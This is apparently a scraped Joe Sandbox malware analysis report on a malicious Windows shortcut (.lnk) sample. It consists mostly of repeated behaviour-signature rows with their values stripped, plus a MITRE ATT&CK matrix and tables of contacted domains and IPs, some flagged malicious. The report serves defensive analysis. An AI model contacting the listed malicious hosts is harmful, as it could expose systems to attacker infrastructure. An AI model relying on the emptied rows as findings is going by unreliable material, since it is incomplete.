Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: |
Persistence and Installation Behavior |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Boot Survival |
---|
Source: | Process created: |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | |||
Source: | Thread delayed: |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | |||
Source: | Window / User API: |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | |||
Source: | Thread sleep count: | |||
Source: | Thread sleep time: | |||
Source: | Thread sleep time: |
Source: | File opened: | Jump to behavior |
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | |||
Source: | Thread delayed: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process queried: |
Source: | Process token adjusted: | Jump to behavior | ||
Source: | Process token adjusted: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: | |||
Source: | Queries volume information: |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Command and Scripting Interpreter | 1 Scheduled Task/Job | 12 Process Injection | 11 Masquerading | OS Credential Dumping | 21 Security Software Discovery | Remote Services | 11 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 41 Virtualization/Sandbox Evasion | LSASS Memory | 12 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | Logon Script (Windows) | 1 DLL Side-Loading | 12 Process Injection | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Deobfuscate/Decode Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Software Packing | Cached Domain Credentials | 2 System Network Configuration Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 21 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
42% | ReversingLabs | Shortcut.Trojan.WinLnk | ||
100% | Joe Sandbox ML |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
ofc.mofserviceserver.top | 172.67.149.9 | true | true | unknown | |
me-ycpi-cf-www.g06.yahoodns.net | 87.248.119.251 | true | false | unknown | |
www.google.com | 142.250.186.36 | true | false | unknown | |
gateway.discord.gg | 162.159.135.234 | true | false | unknown | |
www.protonmail.com | 185.70.42.31 | true | true | unknown | |
pmofficepakistancloudserver.shiftroof.top | 172.67.132.65 | true | false | unknown | |
pmo.gov.pk | 203.101.184.118 | true | true | unknown | |
www.nadra.gov.pk | 104.22.15.154 | true | true | unknown | |
cloud.dellicon.top | 188.114.97.3 | true | false | unknown | |
www.yahoo.com | unknown | unknown | true | unknown | |
1.1.1.1.in-addr.arpa | unknown | unknown | true | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true | unknown | ||
false | unknown | ||
false | unknown | ||
false | unknown | ||
false | unknown | ||
false | unknown | ||
false | unknown | ||
true | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | unknown | |||
true | unknown | |||
false | unknown | |||
false | unknown | |||
false |
| unknown | ||
true | unknown | |||
false | unknown | |||
false | unknown | |||
false | unknown | |||
false | unknown | |||
false | unknown | |||
false |
| unknown | ||
false |
| unknown | ||
false | unknown | |||
false |
| unknown | ||
true | unknown | |||
false |
| unknown | ||
false | unknown | |||
false |
| unknown | ||
false | unknown | |||
false |
| unknown | ||
false | unknown | |||
false |
| unknown | ||
false | unknown | |||
false | unknown | |||
false |
| unknown | ||
true | unknown | |||
false | unknown | |||
false | unknown | |||
false | unknown | |||
false | unknown | |||
false | unknown | |||
false | unknown | |||
false | unknown | |||
false | unknown | |||
false | unknown | |||
true | unknown | |||
false | unknown | |||
false |
| unknown | ||
false | unknown | |||
false | unknown | |||
false |
| unknown | ||
false | unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
142.250.186.36 | www.google.com | United States | 15169 | GOOGLEUS | false | |
104.22.15.154 | www.nadra.gov.pk | United States | 13335 | CLOUDFLARENETUS | true | |
172.67.132.65 | pmofficepakistancloudserver.shiftroof.top | United States | 13335 | CLOUDFLARENETUS | false | |
203.101.184.118 | pmo.gov.pk | Pakistan | 9541 | CYBERNET-APCyberInternetServicesPvtLtdPK | true | |
162.159.135.234 | gateway.discord.gg | United States | 13335 | CLOUDFLARENETUS | false | |
172.67.149.9 | ofc.mofserviceserver.top | United States | 13335 | CLOUDFLARENETUS | true | |
239.255.255.250 | unknown | Reserved | unknown | unknown | false | |
188.114.97.3 | cloud.dellicon.top | European Union | 13335 | CLOUDFLARENETUS | false |
IP |
---|
192.168.2.7 |
192.168.2.4 |
127.0.0.1 |
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1522858 |
Start date and time: | 2024-09-30 18:57:12 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 8m 41s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 22 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | BX7yRz7XqF.lnkrenamed because original name is a hash value |
Original Sample Name: | 7d1585f9ed317bf06a63bd5aaaf015f6066c51a7153370579b2836d66142f877.lnk |
Detection: | MAL |
Classification: | mal100.troj.evad.winLNK@34/25@22/11 |
EGA Information: |
|
HCA Information: | Failed |
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe
- Excluded IPs from analysis (whitelisted): 142.250.186.99, 142.250.186.46, 66.102.1.84, 34.104.35.123, 23.43.61.160, 184.28.90.27, 84.201.210.37, 142.250.185.131, 142.250.185.174
- Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, time.windows.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, e16604.g.akamaiedge.net, update.googleapis.com, clients.l.google.com, prod.fs.microsoft.com.akadns.net
- Execution Graph export aborted for target powershell.exe, PID 5140 because it is empty
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateKey calls found.
- Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
- VT rate limit hit for: BX7yRz7XqF.lnk
Time | Type | Description |
---|---|---|
12:58:22 | API Interceptor | |
12:58:25 | API Interceptor | |
18:58:28 | Task Scheduler |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
172.67.149.9 | Get hash | malicious | HTMLPhisher, HtmlDropper | Browse | ||
Get hash | malicious | HtmlDropper, HTMLPhisher | Browse | |||
239.255.255.250 | Get hash | malicious | PureLog Stealer, zgRAT | Browse | ||
Get hash | malicious | HTMLPhisher | Browse | |||
Get hash | malicious | HTMLPhisher | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
188.114.97.3 | Get hash | malicious | FormBook | Browse |
| |
Get hash | malicious | RedLine, Xmrig | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
